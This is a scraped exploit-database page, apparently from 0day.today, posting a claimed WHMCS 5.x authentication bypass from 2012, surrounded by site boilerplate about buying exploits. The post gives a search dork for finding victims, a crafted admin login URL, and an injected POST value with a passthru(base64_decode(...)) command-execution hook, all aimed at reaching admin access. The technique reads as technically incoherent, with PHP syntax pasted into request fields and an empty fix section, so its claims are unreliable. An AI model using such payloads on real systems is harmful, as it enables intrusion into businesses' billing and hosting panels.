0day.today - Biggest Exploit Database in the World.
Things you should know about 0day.today:
Administration of this site uses the official contacts. Beware of impostors!
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
WHMCS 5.x Authentication Bypass Vulnerability
################################################## # Description : WHMCS 5.x Authentication Bypass Vulnerability # Author : Agd_Scorp # Contact: vorscorp@hotmail.com # Version : 5.x # Link : http://www.whmcs.com/order-now/ # Date : Monday, December 31, 2012 # Dork : intext:Powered by WHMCompleteSolution ################################################## Recommended: You must have BEeF or Tamper Data already installed, I do not recommend doing this process manually. # The Fact: WHMCS 5.0 is completely vulnerable to this vulenrability, but in 5.1 version, WHMCS has added extra cache-security, so I've added an extra-payload for it, you can do the exploitation-process without the payload in the 5.0 version. # The Exploitation http://site.com/whmcs/admin/login.php?correct&cache=1?login=getpost{} after you have successfully entered that into your browser, the page will lag for abit due to the cache-validation, which we, ofcourse, will change it. ;-) when the page is loading, quickly open Tamper Data and change the loading POST_SESSION request & the payload to this: POST: $post(login=1);passthru(base64_decode(\$_SERVER[HTTP_CMD]))&login_cancel;die;"; Payload: $payload = "login=1&title=1&execorder=0&hook=urlencoded&redirect={admin_index}"; # The Result Once you have done this process, you will be automatically be redirected to the admin page, although, if the administrator has enabled cache-security, this process will fail. # Solution & Fix # 0day.today [2024-12-25] #